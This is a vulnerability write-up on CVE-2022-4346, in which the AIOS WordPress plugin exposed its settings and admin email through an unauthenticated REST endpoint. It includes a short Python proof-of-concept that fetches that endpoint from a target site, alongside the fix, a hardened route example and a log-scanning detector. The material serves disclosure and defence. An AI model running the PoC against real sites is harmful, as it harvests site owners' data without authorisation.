CVE-2022-4346 - How AIOS WordPress Plugin Leaked Plugin Settings And Emails — A Deep Dive
If you’re running a WordPress site, chances are you want it safe from hackers and data leaks. That’s why so many users trust the All-In-One Security (AIOS) plugin to lock things down. But, back in 2022, a vulnerability was discovered that did just the opposite. This bug — tracked as CVE-2022-4346 — exposed sensitive plugin settings, including your site’s admin email address, to anyone on the internet!
Let’s break down what happened, how the leak worked, and what you should do to patch up this hole — with real code examples so you can see the dangers for yourself.
What Was The Bug?
The main issue lay in the AIOS plugin (before version 5.1.3): it unintentionally leaked its configuration settings, including the email address set in its options, through a publicly accessible REST API endpoint. This meant:
- Anyone (even without logging in) could open a specific URL and see sensitive plugin data, including email addresses.
- Attackers could harvest information, plan attacks, or even spam admin emails.
Plugin Affected: All-In-One Security (AIOS)
Affected Versions: Before 5.1.3
The Problematic Endpoint
WordPress plugins sometimes provide REST API endpoints for other plugins or admin tools to fetch settings. But the AIOS endpoint didn't check whether the requester actually had the right permissions before returning sensitive data.
In affected versions (before 5.1.3), the settings could be fetched with a plain HTTP GET request to a URL like:
https://yourwordpresssite.com/wp-json/aios/v1/settings/all
And BOOM — the whole AIOS plugin configuration, including the admin email, would be returned as plain JSON, like this:
{
"email_address": "admin@example.com",
"other_setting": "value",
// lots more config data...
}
Proof of Concept Code
Here’s a simple Python script anyone could have used to grab data from any vulnerable WordPress site using this plugin:
import requests

def get_aios_settings(url):
    # Build the endpoint URL from the site root (trailing slash stripped)
    endpoint = f"{url.rstrip('/')}/wp-json/aios/v1/settings/all"
    resp = requests.get(endpoint)
    if resp.status_code == 200:
        print("[+] Leaked AIOS settings:")
        print(resp.text)
    else:
        print("[-] Failed to retrieve settings (might be patched)")

# Usage:
get_aios_settings("https://victimsite.com")
Swap in the target site's URL and the returned JSON would contain the admin email address and the plugin's configuration settings. With that data, an attacker could carry out:
- Spam attacks: Junk or phishing emails can be sent straight to the admin.
- Site fingerprinting: Reveals details about what security tools you use, helping hackers tailor attacks.
Linking To Official Sources
- CVE-2022-4346 at NIST
- AIOS plugin changelog (search for version 5.1.3)
- WPScan Advisory
How Did Developers Fix It?
The fix, pushed in version 5.1.3, made sure only logged-in admins could access the endpoint. In code, it looks like this:
// Before: (no permission checks)
register_rest_route('aios/v1', '/settings/all', [
    'methods'  => 'GET',
    'callback' => 'aios_get_all_settings',
]);

// After: (permission callback added)
register_rest_route('aios/v1', '/settings/all', [
    'methods'             => 'GET',
    'callback'            => 'aios_get_all_settings',
    'permission_callback' => function () {
        return current_user_can('manage_options');
    },
]);
By adding that permission_callback, only site admins could fetch this sensitive data.
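To show the general pattern behind that fix, here is an added example (not the AIOS plugin's own code) of a REST route registered the way WordPress expects: a permission_callback that returns a 401 for anonymous callers and a 403 for logged-in users without the manage_options capability, and a route callback that strips secrets before the response is built. The namespace example-plugin/v1, the option name example_plugin_settings and the field names api_key and smtp_password are assumptions for illustration.

```php
<?php
// Added example, not code from the AIOS plugin. Route namespace, option name
// and the field names below are assumptions chosen for illustration.

add_action( 'rest_api_init', function () {
    register_rest_route( 'example-plugin/v1', '/settings', array(
        'methods'             => WP_REST_Server::READABLE, // GET
        'callback'            => 'example_plugin_get_settings',
        'permission_callback' => 'example_plugin_can_read_settings',
    ) );
} );

/**
 * Permission callback: WordPress runs this before the route callback on every
 * request. Returning a WP_Error lets us choose the HTTP status; returning
 * false would also block the request, but with a generic message.
 */
function example_plugin_can_read_settings( WP_REST_Request $request ) {
    if ( ! is_user_logged_in() ) {
        return new WP_Error(
            'rest_not_logged_in',
            __( 'You must be logged in to read plugin settings.', 'example-plugin' ),
            array( 'status' => 401 )
        );
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        return new WP_Error(
            'rest_forbidden',
            __( 'Administrator capability required.', 'example-plugin' ),
            array( 'status' => 403 )
        );
    }
    return true;
}

/**
 * Route callback: only reached after the permission callback returned true.
 * Even then, fields that should never leave the server are removed first.
 */
function example_plugin_get_settings( WP_REST_Request $request ) {
    $settings = (array) get_option( 'example_plugin_settings', array() );

    // Assumed secret fields: never expose these, not even to administrators.
    $never_expose = array( 'api_key', 'smtp_password' );
    foreach ( $never_expose as $field ) {
        unset( $settings[ $field ] );
    }

    return rest_ensure_response( $settings );
}
```

Two design points are worth noting. Since WordPress 5.5, registering a route without a permission_callback triggers a _doing_it_wrong notice, so a missing check like the one in CVE-2022-4346 now shows up in debug logs during development. And the permission callback only answers "who may call this?"; deciding which fields are safe to return is a separate step that belongs in the route callback.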
What Should You Do?
1. Update Immediately: Make sure you're running at least version 5.1.3 or higher!
2. Audit Your Users & Settings: Check if anything unusual occurred around the time before your update.
3. Watch For Spam: Be ready for phishing/spam emails if your admin email was exposed.
4. Check Your Site: Search your own site on SecurityTrails or other tools to see what information is publicly visible.
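For the audit step above, the most direct evidence of whether the leak was actually read is your web server access log. The following added example (not part of the original post) scans access log lines in combined format and reports every GET to /wp-json/aios/v1/settings/all that was answered with 200, which is what an unpatched site returned to anonymous callers. The log lines are constructed samples; point the script at your own log instead.

```php
<?php
// Added example, not part of the original post: report successful reads of
// the AIOS settings endpoint from access logs. Sample lines are constructed.

const LEAK_PATH = '/wp-json/aios/v1/settings/all';

// Combined log format:
// ip - user [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
const LOG_PATTERN = '~^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"~';

/**
 * Return one entry per request that successfully fetched the settings.
 * A 401/403 on the same path means the patched plugin refused the request,
 * so those lines are not reported as leaks.
 */
function find_leak_hits(array $lines): array {
    $hits = [];
    foreach ($lines as $line) {
        if (!preg_match(LOG_PATTERN, $line, $m)) {
            continue; // not a combined-format line; skip it
        }
        [, $ip, $time, $method, $path, $status, $ua] = $m;
        // Drop any query string so "/settings/all?x=1" still matches.
        $path = strtok($path, '?');
        if ($method === 'GET' && $path === LEAK_PATH && $status === '200') {
            $hits[] = ['ip' => $ip, 'time' => $time, 'ua' => $ua];
        }
    }
    return $hits;
}

// Constructed sample log: two successful reads, one unrelated request, and
// one request refused with 401 after the update to 5.1.3.
$sample_log = [
    '203.0.113.7 - - [10/Jan/2023:04:12:09 +0000] "GET /wp-json/aios/v1/settings/all HTTP/1.1" 200 1843 "-" "python-requests/2.28.1"',
    '198.51.100.23 - - [10/Jan/2023:04:12:30 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2023:04:13:01 +0000] "GET /wp-json/aios/v1/settings/all?x=1 HTTP/1.1" 200 1843 "-" "curl/7.85.0"',
    '192.0.2.44 - - [12/Jan/2023:09:00:00 +0000] "GET /wp-json/aios/v1/settings/all HTTP/1.1" 401 89 "-" "Mozilla/5.0"',
];

$hits = find_leak_hits($sample_log);
foreach ($hits as $hit) {
    printf("[!] %s fetched AIOS settings at %s (UA: %s)\n", $hit['ip'], $hit['time'], $hit['ua']);
}
printf("%d successful read(s) of %s found\n", count($hits), LEAK_PATH);
```

Run it with php on a copy of the log (replace $sample_log with file('/path/to/access.log')). A non-browser user agent such as python-requests or curl on these hits is a useful signal that the request was scripted rather than an admin using the dashboard, and any hit dated before your update is the data you should assume was disclosed.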
Final Thoughts
CVE-2022-4346 is a classic example of why WordPress plugin security matters — and why keeping your website and plugins updated is absolutely essential. If you relied on AIOS, patch up now, and always check changelogs for “security” labels.
If you’re a plugin developer, always double-check REST API routes for proper permissions. A single missing line can leak far more than you imagine!
References
- CVE-2022-4346 at NVD
- WPScan Advisory
- WordPress Plugin Page
Timeline
Published on: 01/23/2023 15:15:00 UTC
Last modified on: 01/30/2023 18:06:00 UTC